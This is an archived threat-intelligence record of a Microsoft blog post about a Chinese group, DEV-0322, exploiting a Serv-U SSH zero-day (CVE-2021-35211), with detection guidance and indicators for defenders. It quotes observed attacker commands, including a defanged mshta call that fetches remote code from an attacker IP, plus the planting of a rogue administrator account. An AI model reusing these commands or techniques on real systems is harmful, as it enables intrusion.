{
	"id": "6390d765-4809-4379-8070-f9d044a6bf21",
	"created_at": "2026-04-06T00:13:55.173839Z",
	"updated_at": "2026-04-10T03:26:57.745719Z",
	"deleted_at": null,
	"sha1_hash": "faeed2d82f963c890cbf6022b2357ef3d87ff30c",
	"title": "Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit | Microsoft Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 108336,
	"plain_text": "Microsoft discovers threat actor targeting SolarWinds Serv-U\r\nsoftware with 0-day exploit | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2021-07-13 · Archived: 2026-04-05 13:25:23 UTC\r\nMicrosoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP\r\nsoftware in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this\r\ncampaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology,\r\ntactics, and procedures.\r\nThe vulnerability being exploited is CVE-2021-35211, which was recently patched by SolarWinds. The\r\nvulnerability, which Microsoft reported to SolarWinds, exists in Serv-U’s implementation of the Secure Shell\r\n(SSH) protocol. If Serv-U’s SSH is exposed to the internet, successful exploitation would give attackers ability to\r\nremotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious\r\npayloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest\r\navailable version.\r\nMicrosoft 365 Defender has been protecting customers against malicious activity resulting from successful\r\nexploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files,\r\nbehavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker’s follow-on\r\nmalicious actions. Microsoft Threat Experts customers who were affected were notified of attacker activity and\r\nwere aided in responding to the attack.\r\nMicrosoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we\r\nreported.\r\nWho is DEV-0322?\r\nMSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and\r\ninvestigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind\r\nan operation, we refer to the unidentified threat actor as a “development group” or “DEV group” and assigns each\r\nDEV group a unique number (DEV-####) for tracking purposes.\r\nMSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software\r\ncompanies. This activity group is based in China and has been observed using commercial VPN solutions and\r\ncompromised consumer routers in their attacker infrastructure.\r\nAttack details\r\nMSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation.\r\nAn anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been\r\nhttps://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\r\nPage 1 of 4\n\ncompromised. Some examples of the malicious processes spawned from Serv-U.exe include:\r\nC:\\Windows\\System32\\mshta.exe http://144[.]34[.]179[.]162/a (defanged)\r\ncmd.exe /c whoami \u003e “./Client/Common/redacted.txt”\r\ncmd.exe /c dir \u003e “.\\Client\\Common\\redacted.txt”\r\ncmd.exe /c “”C:\\Windows\\Temp\\Serv-U.bat””\r\npowershell.exe C:\\Windows\\Temp\\Serv-U.bat\r\ncmd.exe /c type \\\\redacted\\redacted.Archive \u003e “C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global\r\nUsers\\redacted.Archive”\r\nWe observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \\Client\\Common\\\r\nfolder, which is accessible from the internet by default, so that the attackers could retrieve the results of the\r\ncommands. The actor was also found adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user\r\ninformation is stored in these .Archive files.\r\nDue to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process,\r\nan exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after\r\na malicious command was run.\r\nBy reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked\r\nwith the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary\r\nand identified the vulnerability through black box analysis. Once a root cause was found, we reported the\r\nvulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.\r\nTo protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections\r\nthat catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity\r\nrelated to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service,\r\nreceived a targeted attack notification, which contained details of the compromise. The Microsoft Threat Experts\r\nand MSTIC teams worked closely with these customers to respond to the attack and ensure their environments\r\nwere secure.\r\nDetection guidance\r\nCustomers should review the Serv-U DebugSocketLog.txt log file for exception messages like the line below. A\r\nC0000005; CSUSSHSocket::ProcessReceive exception can indicate that an exploit was attempted, but it can also\r\nappear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs\r\nfor behaviors and indicators of compromise discussed here.\r\nEXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6;\r\nnPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5\r\nAdditional signs of potential compromise include:\r\nRecent creation of .txt files in the Client\\Common\\ directory for the Serv-U installation. These files may\r\ncontain output from Windows commands like whoami and dir.\r\nhttps://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\r\nPage 2 of 4\n\nServ-U.exe spawning child processes that are not part of normal operations. These could change depending\r\non the customer environment, but we suggest searching for:\r\nmshta.exe\r\npowershell.exe\r\ncmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line:\r\nwhoami\r\ndir\r\n./Client/Common\r\n.\\Client\\Common\r\ntype [a file path] \u003e “C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\[file\r\nname].Archive”\r\nAny process with any of the following in the command line:\r\nC:\\Windows\\Temp\\\r\nThe addition of any unrecognized global users to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in\r\nC:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users, which appears to store the Global users\r\ninformation.\r\nDetection details\r\nAntivirus detections\r\nMicrosoft Defender Antivirus detects threat components as the following malware:\r\nBehavior:Win32/ServuSpawnSuspProcess.A\r\nBehavior:Win32/ServuSpawnCmdClientCommon.A\r\nEndpoint detection and response (EDR) alerts\r\nAlerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:\r\nSuspicious behavior by Serv-U.exe\r\nhttps://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\r\nPage 3 of 4\n\nAzure Sentinel query\r\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these\r\nindicators in this GitHub repository.\r\nIndicators of compromise (IOCs)\r\n98[.]176[.]196[.]89\r\n68[.]235[.]178[.]32\r\n208[.]113[.]35[.]58\r\n144[.]34[.]179[.]162\r\n97[.]77[.]97[.]58\r\nhxxp://144[.]34[.]179[.]162/a\r\nC:\\Windows\\Temp\\Serv-U.bat\r\nC:\\Windows\\Temp\\test\\current.dmp\r\nSource: https://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with\r\n-0-day-exploit/\r\nhttps://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/"
	],
	"report_names": [
		"microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit"
	],
	"threat_actors": [
		{
			"id": "0a80df4d-5ab7-4ca3-809d-8ef7b5a54f1f",
			"created_at": "2023-11-21T02:00:07.386886Z",
			"updated_at": "2026-04-10T02:00:03.474764Z",
			"deleted_at": null,
			"main_name": "TiltedTemple",
			"aliases": [
				"Circle Typhoon",
				"DEV-0322"
			],
			"source_name": "MISPGALAXY:TiltedTemple",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434435,
	"ts_updated_at": 1775791617,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/faeed2d82f963c890cbf6022b2357ef3d87ff30c.pdf",
		"text": "https://archive.orkl.eu/faeed2d82f963c890cbf6022b2357ef3d87ff30c.txt",
		"img": "https://archive.orkl.eu/faeed2d82f963c890cbf6022b2357ef3d87ff30c.jpg"
	}
}